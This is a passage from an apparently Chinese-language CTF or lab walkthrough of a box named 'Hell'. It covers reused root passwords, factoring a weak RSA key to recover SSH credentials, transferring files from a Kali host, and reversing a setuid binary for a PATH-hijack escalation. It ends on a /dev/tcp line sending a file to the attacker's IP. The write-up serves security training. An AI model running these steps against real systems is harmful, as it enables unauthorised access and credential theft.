data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543126.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417020731545\" \/><\/div><\/p>\n<p>Got the user:<\/p>\n<pre><code class=\"language-apl\">txhaka\niamoswe2023!<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543127.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543127.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417020857162\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Information gathering [5-6]<\/h3>\n<pre><code class=\"language-bash\">txhaka@53270a4eed2d:~$ cat flag.txt \n\n\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2003 \u2003\u2588\u2584\u2584\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2580\u2003\u2584\u2580\u2588\u2003\u2588\u2584 \u2588\n\u2584\u2588\u2003\u2580\u2580\u2588\u2003\u2588\u2584\u2584\u2003\u2588\u2003 \u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\u2003\u2588\u2580\u2588\u2003\u2588 \u2580\u2588\n\nFlag 5: HELL{7H3_B00L34N_15_4150_4_VU1N}<\/code><\/pre>\n<p>Then one of the passwords above, <code>superrootpassword<\/code>, is enough to log in as root (the same credential reuse as before)!<\/p>\n<pre><code class=\"language-bash\">txhaka@53270a4eed2d:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\ntxhaka@53270a4eed2d:~$ su root\nPassword: \nroot@53270a4eed2d:\/home\/txhaka# cd \/root\nroot@53270a4eed2d:~# ls -la\ntotal 40\ndrwx------ 1 root root 4096 Feb 16  2023 .\ndrwxr-xr-x 1 root root 4096 Apr 16 10:22 ..\n-rw------- 1 root root   52 Feb 16  2023 
.bash_history\n-rw-r--r-- 1 root root 3106 Oct 15  2021 .bashrc\ndrwxr-xr-x 3 root root 4096 Feb 16  2023 .local\n-rw------- 1 root root 1321 Feb 16  2023 .mysql_history\n-rw-r--r-- 1 root root  161 Jul  9  2019 .profile\ndrwxr-xr-x 2 root root 4096 Feb 16  2023 creds\n-rw-r--r-- 1 root root  273 Feb 16  2023 flag.txt\n-rw-r--r-- 1 root root  132 Feb 16  2023 message.txt\nroot@53270a4eed2d:~# cat flag.txt \n\n\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2580\u2588\u2580\u2003 \u2003 \u2003 \u2003 \u2003\u2584\u2580\u2588\u2003\u2588\u2580\u2580\u2003\u2584\u2580\u2588\u2003\u2588\u2003\u2588\u2584 \u2588\n\u2588\u2580\u2584\u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003 \u2588 \u2003\u2584\u2003\u2584\u2003\u2584\u2003 \u2003\u2588\u2580\u2588\u2003\u2588\u2584\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2003\u2588 \u2580\u2588\n\nFlag 6: HELL{7H3_5QL1_15_7H3_K3Y}\n\nroot@53270a4eed2d:~# cat message.txt\n\nFrom: pascualropi@hell.h4u\n\nHi, I have left ssh credentials in the .enc file, remember to decrypt it with your private rsa key :)\n\nroot@53270a4eed2d:~# cd creds\/\nroot@53270a4eed2d:~\/creds# ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Feb 16  2023 .\ndrwx------ 1 root root 4096 Feb 16  2023 ..\n-rw-r--r-- 1 root root  129 Feb 16  2023 creds.enc\n-rw-r--r-- 1 root root  451 Feb 16  2023 public.crt\nroot@53270a4eed2d:~\/creds# cd ..\nroot@53270a4eed2d:~# cat .bash_history \nc\ncd\nls\nclear\ncat flag.txt \nls\nclear\nc d\ncd \nl\nexit\nroot@53270a4eed2d:~# cd creds\/\nroot@53270a4eed2d:~\/creds# ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Feb 16  2023 .\ndrwx------ 1 root root 4096 Feb 16  2023 ..\n-rw-r--r-- 1 root root  129 Feb 16  2023 creds.enc\n-rw-r--r-- 1 root root  451 Feb 16  2023 public.crt\nroot@53270a4eed2d:~\/creds# cat creds.enc \n........(\u5947\u602a\u7684\u5b57\u7b26)\nroot@53270a4eed2d:~\/creds# cat public.crt \n-----BEGIN PUBLIC 
KEY-----\nMIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKBgQGN24SSfsyl\/rFafZuCr54a\nBqEpk9fJDFa78Qnk177LTPwWgJPdgY6ZZC9w7LWuy9+fSFfDnF4PI3DRPDpvvqmB\njQh7jykg7N4FUC5dkqx4gBw+dfDfytHR1LeesYfJI6KF7s0FQhYOioCVyYGmNQop\nlt34bxbXgVvJZUMfBFC6LQKBgQCkzWwClLUdx08Ezef0+356nNLVml7eZvTJkKjl\n2M6sE8sHiedfyQ4Hvro2yfkrMObcEZHPnIba0wZ\/8+cgzNxpNmtkG\/CvNrZY81iw\n2lpm81KVmMIG0oEHy9V8RviVOGRWi2CItuiV3AUIjKXT\/TjdqXcW\/n4fJ+8YuAML\nUCV4ew==\n-----END PUBLIC KEY-----\nroot@53270a4eed2d:~\/creds# file creds.enc \ncreds.enc: data<\/code><\/pre>\n<p>\u5173\u4e8ersa\u52a0\u5bc6\u7684\u76f8\u5173\u4e8b\u9879\uff0c\u6211\u67e5\u627e\u5230\u7684\u8d44\u6599\u4e2d\u77e5\u4e4e\u4f5c\u8005<a href=\"https:\/\/www.zhihu.com\/people\/liu-jin-guang-84\">satadriver<\/a>\u7684\u56de\u7b54\u7b80\u6d01\u660e\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543128.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543128.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417022814209\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u63d0\u53d6\u4e00\u4e0bN\uff08\u4e24\u7d20\u6570\u76f8\u4e58\u5f97\u5230\u7684\u6a21\uff09\u548cE\uff08\u516c\u5f00\u6307\u6570\uff09\uff1a<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/env python3\nfrom Crypto.PublicKey import RSA\n\nwith open(&quot;public.crt&quot;, &quot;r&quot;) as f:\n    key = RSA.import_key(f.read())\n    e = key.e\n    n = 
key.n\nprint(&quot;[+]e==&gt;{}\\n[+]n==&gt;{}&quot;.format(e,n))<\/code><\/pre>\n<blockquote>\n<p>windows\u53ef\u80fd\u4f1a\u51fa\u73b0\u62a5\u9519\uff0c\u53ef\u4ee5\u5c1d\u8bd5https:\/\/blog.csdn.net\/u011027547\/article\/details\/123581758<\/p>\n<\/blockquote>\n<p>\u63d0\u53d6\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-text\">[+]e==&gt;115728201506489397643589591830500007746878464402967704982363700915688393155096410811047118175765086121588434953079310523301854568599734584654768149408899986656923460781694820228958486051062289463159083249451765181542090541790670495984616833698973258382485825161532243684668955906382399758900023843171772758139\n[+]n==&gt;279385031788393610858518717453056412444145495766410875686980235557742299199283546857513839333930590575663488845198789276666170586375899922998595095471683002939080133549133889553219070283957020528434872654142950289279547457733798902426768025806617712953244255251183937835355856887579737717734226688732856105517<\/code><\/pre>\n<p>\u4f7f\u7528<a href=\"http:\/\/factordb.com\/\">\u8fd9\u4e2a\u7f51\u7ad9<\/a>\u5bf9n\u8fdb\u884c\u5206\u89e3\u56e0\u5f0f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543129.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543129.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417025452224\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u5f97\u5230\u4e24\u4e2a\u56e0\u5f0f\uff1a<\/p>\n<pre><code>p=138332730979330219856304683346871871770016076664792385217756486565264414883613702355484155067169073708131875489151186473\n19766004327241150104265530014047083\nq=201965962654304519806134133066947216662284527878164688789843567876520994722309341291582467112996951355410672076462819016\n20878148034692171475252446937792199\nm=n-(p+q-1)<\/code><\/pre>\n<p>\u7136\u540e\u53c2\u8003\u76f8\u5173\u7684\u811a\u672c\u8fdb\u884c\u7f16\u5199\uff1a<a href=\"https:\/\/stackoverflow.com\/questions\/4798654\/modular-multiplicative-inverse-function-in-python\">https:\/\/stackoverflow.com\/questions\/4798654\/modular-multiplicative-inverse-function-in-python<\/a><\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\nfrom Crypto.PublicKey import RSA\n\nn=279385031788393610858518717453056412444145495766410875686980235557742299199283546857513839333930590575663488845198789276666170586375899922998595095471683002939080133549133889553219070283957020528434872654142950289279547457733798902426768025806617712953244255251183937835355856887579737717734226688732856105517\ne=115728201506489397643589591830500007746878464402967704982363700915688393155096410811047118175765086121588434953079310523301854568599734584654768149408899986656923460781694820228958486051062289463159083249451765181542090541790670495984616833698973258382485825161532243684668955906382399758900023843171772758139\np=13833273097933021985630468334687187177001607666479238521775648656526441488361370235548415506716907370813187548915118647319766004327241150104265530014047083\nq=20196596265430451980613413306694721666228452787816468878984356787652099472230934129158246711299695135541067207646281901620878148034692171475252446937792199\n\nm=n-(p+q-1)\n\ndef egcd(a, b):\n    if a == 0:\n        return (b, 0, 1)\n    else:\n        g, y, x = egcd(b % a, a)\n        return (g, x - (b \/\/ a) * y, y)\n\ndef modinv(a, m):\n    g, x, y = egcd(a, m)\n    if g 
!= 1:\n        raise\n    else:\n        return x % m\n\nd = modinv(e, m)\n\nkey = RSA.construct((n, e, d, p, q))\nprint(key.exportKey().decode())<\/code><\/pre>\n<p>\u7136\u540e\u5c31\u6784\u5efa\u51fa\u79c1\u94a5\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">-----BEGIN RSA PRIVATE KEY-----\nMIICOQIBAAKBgQGN24SSfsyl\/rFafZuCr54aBqEpk9fJDFa78Qnk177LTPwWgJPd\ngY6ZZC9w7LWuy9+fSFfDnF4PI3DRPDpvvqmBjQh7jykg7N4FUC5dkqx4gBw+dfDf\nytHR1LeesYfJI6KF7s0FQhYOioCVyYGmNQoplt34bxbXgVvJZUMfBFC6LQKBgQCk\nzWwClLUdx08Ezef0+356nNLVml7eZvTJkKjl2M6sE8sHiedfyQ4Hvro2yfkrMObc\nEZHPnIba0wZ\/8+cgzNxpNmtkG\/CvNrZY81iw2lpm81KVmMIG0oEHy9V8RviVOGRW\ni2CItuiV3AUIjKXT\/TjdqXcW\/n4fJ+8YuAMLUCV4ewIgSJiewFB8qwlK2nqa7taz\nd6DQtCKbEwXMl4BUeiJVRkcCQQEIH6FjRIVKckAWdknyGOzk3uO0fTEH9+097y0B\nA5OBHosBfo0agYxd5M06M4sNzodxqnRtfgd7R8C0dsrnBhtrAkEBgZ7n+h78BMxC\nh6yTdJ5rMTFv3a7\/hGGcpCucYiadTIxfIR0R1ey8\/Oqe4HgwWz9YKZ1re02bL9fn\ncIKouKi+xwIgSJiewFB8qwlK2nqa7tazd6DQtCKbEwXMl4BUeiJVRkcCIEiYnsBQ\nfKsJStp6mu7Ws3eg0LQimxMFzJeAVHoiVUZHAkA3pS0IKm+cCT6r0fObMnPKoxur\nbzwDyPPczkvzOAyTGsGUfeHhseLHZKVAvqzLbrEdTFo906cZWpLJAIEt8SD9\n-----END RSA PRIVATE KEY-----<\/code><\/pre>\n<p>\u53d1\u9001\u8fc7\u53bb\uff0c\u5c1d\u8bd5\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ vim rsa           \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ head rsa           \n-----BEGIN RSA PRIVATE 
KEY-----\nMIICOQIBAAKBgQGN24SSfsyl\/rFafZuCr54aBqEpk9fJDFa78Qnk177LTPwWgJPd\ngY6ZZC9w7LWuy9+fSFfDnF4PI3DRPDpvvqmBjQh7jykg7N4FUC5dkqx4gBw+dfDf\nytHR1LeesYfJI6KF7s0FQhYOioCVyYGmNQoplt34bxbXgVvJZUMfBFC6LQKBgQCk\nzWwClLUdx08Ezef0+356nNLVml7eZvTJkKjl2M6sE8sHiedfyQ4Hvro2yfkrMObc\nEZHPnIba0wZ\/8+cgzNxpNmtkG\/CvNrZY81iw2lpm81KVmMIG0oEHy9V8RviVOGRW\ni2CItuiV3AUIjKXT\/TjdqXcW\/n4fJ+8YuAMLUCV4ewIgSJiewFB8qwlK2nqa7taz\nd6DQtCKbEwXMl4BUeiJVRkcCQQEIH6FjRIVKckAWdknyGOzk3uO0fTEH9+097y0B\nA5OBHosBfo0agYxd5M06M4sNzodxqnRtfgd7R8C0dsrnBhtrAkEBgZ7n+h78BMxC\nh6yTdJ5rMTFv3a7\/hGGcpCucYiadTIxfIR0R1ey8\/Oqe4HgwWz9YKZ1re02bL9fn\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ python3 -m http.server 8899\nServing HTTP on 0.0.0.0 port 8899 (http:\/\/0.0.0.0:8899\/) ...\n172.20.10.3 - - [16\/Apr\/2024 15:11:11] &quot;GET \/rsa HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<pre><code class=\"language-bash\">root@53270a4eed2d:~\/creds# wget http:\/\/172.20.10.8:8899\/rsa\n--2024-04-16 13:11:12--  http:\/\/172.20.10.8:8899\/rsa\nConnecting to 172.20.10.8:8899... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 838 [application\/octet-stream]\nSaving to: \u2018rsa\u2019\n\nrsa                                   100%[=========================================================================&gt;]     838  --.-KB\/s    in 0s      \n\n2024-04-16 13:11:12 (149 MB\/s) - \u2018rsa\u2019 saved [838\/838]\nroot@53270a4eed2d:~\/creds# openssl pkeyutl -decrypt -inkey rsa -in creds.enc\n\nCredentials for ssh in hell:\n\nUsername: pascual\nPassword: vulnwhatsapp123!<\/code><\/pre>\n<p>\u62ff\u5230\u8d26\u53f7\u5bc6\u7801\uff01\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-apl\">pascual\nvulnwhatsapp123!<\/code><\/pre>\n<p>\u7136\u540e\u4ecekali\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543130.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543130.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417031703746\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fde\u4e0a\u53bb\u4e86\uff01\uff01\uff01<\/p>\n<h3>\u4fe1\u606f\u641c\u96c6[7]<\/h3>\n<pre><code class=\"language-bash\">pascual@hell:~$ whoami;id\npascual\nuid=1004(pascual) gid=1004(pascual) groups=1004(pascual)\npascual@hell:~$ ls -la\ntotal 40\ndrwxr-x--- 5 pascual pascual 4096 Feb 16  2023 .\ndrwxr-xr-x 7 root    root    4096 Feb 16  2023 ..\n-rw------- 1 pascual pascual  295 Feb 16  2023 .bash_history\n-rw-r--r-- 1 pascual pascual  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 pascual pascual 3771 Jan  6  2022 
.bashrc\ndrwx------ 2 pascual pascual 4096 Feb 16  2023 .cache\ndrwxrwxr-x 3 pascual pascual 4096 Feb 16  2023 .local\n-rw-r--r-- 1 pascual pascual  807 Jan  6  2022 .profile\ndrwxrwxr-x 2 pascual pascual 4096 Feb 16  2023 .ssh\n-r-------- 1 pascual pascual  275 Feb 16  2023 flag.txt\npascual@hell:~$ cat flag.txt \n\n\u2588\u2580\u2588\u2003\u2584\u2580\u2588\u2003\u2588\u2580\u2003\u2588\u2580\u2580\u2003\u2588 \u2588\u2003\u2584\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588\n\u2588\u2580\u2580\u2003\u2588\u2580\u2588\u2003\u2584\u2588\u2003\u2588\u2584\u2584\u2003\u2588\u2584\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2584\u2584\u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2588\u2003\u2588\u2580\u2580\u2003\u2588\n\nFlag 7: HELL{R54C7F7001_OR_M4NU41?}\n\npascual@hell:~$ sudo -l\n[sudo] password for pascual: \nSorry, user pascual may not run sudo on hell.\npascual@hell:~$ cd ..\npascual@hell:\/home$ ls -la\ntotal 28\ndrwxr-xr-x  7 root    root    4096 Feb 16  2023 .\ndrwxr-xr-x 19 root    root    4096 Feb 16  2023 ..\ndrwxr-x---  6 eddie   eddie   4096 Feb 16  2023 eddie\ndrwxr-x---  6 gato    gato    4096 Feb 16  2023 gato\ndrwxr-x---  5 ghost   ghost   4096 Feb 16  2023 ghost\ndrwxr-x---  5 pascual pascual 4096 Feb 16  2023 pascual\ndrwxr-x---  3 run     run     4096 Feb 16  2023 run\npascual@hell:\/home$ cd eddie\/\n-bash: cd: eddie\/: Permission denied\npascual@hell:\/home$ cd gato\/\n-bash: cd: gato\/: Permission denied\npascual@hell:\/home$ cd ghost\/\n-bash: cd: ghost\/: Permission denied\npascual@hell:\/home$ mail\n-bash: mail: command not found\npascual@hell:\/home$ cd \/var\/www\npascual@hell:\/var\/www$ ls -la\ntotal 20\ndrwxr-xr-x  4 root root    4096 Feb 16  2023 .\ndrwxr-xr-x 14 root root    4096 Feb 15  2023 ..\n-rw-r--r--  1 root root    3771 Feb 16  2023 .bashrc\ndr-xr-xr-x  2 run  ftpuser 4096 Feb 16  2023 ftp\ndrwxr-xr-x  2 root root    4096 Feb 15  2023 html\npascual@hell:\/var\/www$ 
cd ..\npascual@hell:\/var$ ls -la\ntotal 56\ndrwxr-xr-x 14 root root  4096 Feb 15  2023 .\ndrwxr-xr-x 19 root root  4096 Feb 16  2023 ..\ndrwxr-xr-x  2 root root  4096 Apr 16 15:49 backups\ndrwxr-xr-x 12 root root  4096 Feb 15  2023 cache\ndrwxrwxrwt  2 root root  4096 Feb 15  2023 crash\ndrwxr-xr-x 34 root root  4096 Feb 16  2023 lib\ndrwxrwsr-x  2 root staff 4096 Apr 18  2022 local\nlrwxrwxrwx  1 root root     9 Aug  9  2022 lock -&gt; \/run\/lock\ndrwxr-xr-x 10 root root  4096 Apr 17  2024 log\ndrwxrwsr-x  2 root mail  4096 Feb 16  2023 mail\ndrwxr-xr-x  2 root root  4096 Aug  9  2022 opt\nlrwxrwxrwx  1 root root     4 Aug  9  2022 run -&gt; \/run\ndrwxr-xr-x  2 root root  4096 Aug  8  2022 snap\ndrwxr-xr-x  3 root root  4096 Feb 16  2023 spool\ndrwxrwxrwt  5 root root  4096 Apr 16 19:09 tmp\ndrwxr-xr-x  4 root root  4096 Feb 16  2023 www\npascual@hell:\/var$ mail\n-bash: mail: command not found\npascual@hell:\/var$ cd mail\npascual@hell:\/var\/mail$ ls -la\ntotal 16\ndrwxrwsr-x  2 root    mail    4096 Feb 16  2023 .\ndrwxr-xr-x 14 root    root    4096 Feb 15  2023 ..\n-r--------  1 eddie   eddie    142 Feb 15  2023 eddie\n-r--------  1 pascual pascual  166 Feb 16  2023 pascual\npascual@hell:\/var\/mail$ cat eddie\ncat: eddie: Permission denied\npascual@hell:\/var\/mail$ cat pascual \n\nFrom: eddiedota@hell.h4u\n\nI have created a reports binary in \/opt\/reports\/reports with which you can read the reports by passing an identifier as an argument to it<\/code><\/pre>\n<h3>\u5206\u6790\u7a0b\u5e8f<\/h3>\n<pre><code class=\"language-bash\">pascual@hell:\/var\/mail$ file \/opt\/reports\/reports\n\/opt\/reports\/reports: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=d1b6c948d168422ee65e2906cac08a2217ff8f11, for GNU\/Linux 3.2.0, not stripped\npascual@hell:\/opt\/reports$ ls -l reports \n-rwsr-xr-x 1 eddie eddie 16208 Feb 16  2023 
reports<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">pascual@hell:\/var\/mail$ \/opt\/reports\/reports\n[-] Usage: \/opt\/reports\/reports &lt;id for report&gt;\n\npascual@hell:\/var\/mail$ \/opt\/reports\/reports 1\nVulnerability: A Local File Inclusion has been detected in one of our web servers.\n\npascual@hell:\/var\/mail$ \/opt\/reports\/reports 2\nVulnerability: SQL Injection has been detected in one of our servers.\n\npascual@hell:\/var\/mail$ \/opt\/reports\/reports 3\nAttention: Please fix this as soon as possible.\n\npascual@hell:\/var\/mail$ \/opt\/reports\/reports 4\ncat: \/home\/eddie\/report\/4: No such file or directory<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f20\u5230\u672c\u5730\u9006\u5411\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ file report                     \nreport: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=d1b6c948d168422ee65e2906cac08a2217ff8f11, for GNU\/Linux 3.2.0, not stripped\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ checksec --file=report \nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE\nFull RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   42 Symbols        No    0               2               report<\/code><\/pre>\n<p>ida64\u6253\u5f00\u770b\u4e00\u4e0b\u4e3b\u51fd\u6570\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rbp\n  const char *v4; \/\/ rsi\n  const char *v5; \/\/ rdi\n  int result; \/\/ eax\n  unsigned __int64 v7; \/\/ rdx\n  unsigned __int64 v8; \/\/ rt1\n  const char **v9; \/\/ [rsp-A8h] [rbp-A8h]\n  int i; \/\/ [rsp-94h] [rbp-94h]\n  const 
char *v11; \/\/ [rsp-90h] [rbp-90h]\n  __int64 v12; \/\/ [rsp-88h] [rbp-88h]\n  unsigned __int64 v13; \/\/ [rsp-20h] [rbp-20h]\n  __int64 v14; \/\/ [rsp-8h] [rbp-8h]\n\n  __asm { endbr64 }\n  v14 = v3;\n  v9 = argv;\n  v13 = __readfsqword(0x28u);\n  if ( argc &gt; 1 )\n  {\n    sub_1100(1002LL, 1002LL, envp);\n    v11 = argv[1];\n    for ( i = 0; i &lt; (unsigned __int64)sub_10C0(v11); ++i )\n    {\n      if ( (unsigned int)(v11[i] - 48) &gt; 9 )\n      {\n        v4 = v11;\n        v5 = &quot;\\n\\x1B[0;37m[\\x1B[0;31m-\\x1B[0;37m] The input must be an identifier digit\\n\\n&quot;;\n        sub_10F0(&quot;\\n\\x1B[0;37m[\\x1B[0;31m-\\x1B[0;37m] The input must be an identifier digit\\n\\n&quot;, v11);\n        result = 1;\n        goto LABEL_9;\n      }\n    }\n    sub_10B0(10LL);\n    v4 = &quot;cat \/home\/eddie\/report\/%s&quot;;\n    sub_1110(&amp;v12, &quot;cat \/home\/eddie\/report\/%s&quot;, v11);\n    sub_10E0(&amp;v12);\n    v5 = byte_9 + 1;\n    sub_10B0(10LL);\n    result = 0;\n  }\n  else\n  {\n    v4 = *argv;\n    v5 = &quot;\\n\\x1B[0;37m[\\x1B[0;31m-\\x1B[0;37m] Usage: %s &lt;id for report&gt;\\n\\n&quot;;\n    result = sub_10F0(&quot;\\n\\x1B[0;37m[\\x1B[0;31m-\\x1B[0;37m] Usage: %s &lt;id for report&gt;\\n\\n&quot;, *v9);\n  }\nLABEL_9:\n  v8 = __readfsqword(0x28u);\n  v7 = v13 - v8;\n  if ( v13 != v8 )\n    result = sub_10D0(v5, v4, v7);\n  return result;\n}<\/code><\/pre>\n<h3>\u52ab\u6301\u73af\u5883\u53d8\u91cf<\/h3>\n<p>\u5f88\u660e\u663e\u53d1\u73b0\uff0c\u5b83\u4f7f\u7528\u7684\u662f\u76f8\u5bf9\u8def\u5f84\u800c\u975e\u7edd\u5bf9\u8def\u5f84\uff0c\u5c1d\u8bd5\u52ab\u6301\u73af\u5883\u53d8\u91cf\u8fdb\u884c\u6267\u884c\u6211\u4eec\u60f3\u8981\u7684\u51fd\u6570\uff01<\/p>\n<pre><code class=\"language-bash\">pascual@hell:\/opt\/reports$ cat reports &gt; \/dev\/tcp\/172.20.10.8:8888\n-bash: \/dev\/tcp\/172.20.10.8:8888: No such file or directory\npascual@hell:\/opt\/reports$ cat reports &gt; 
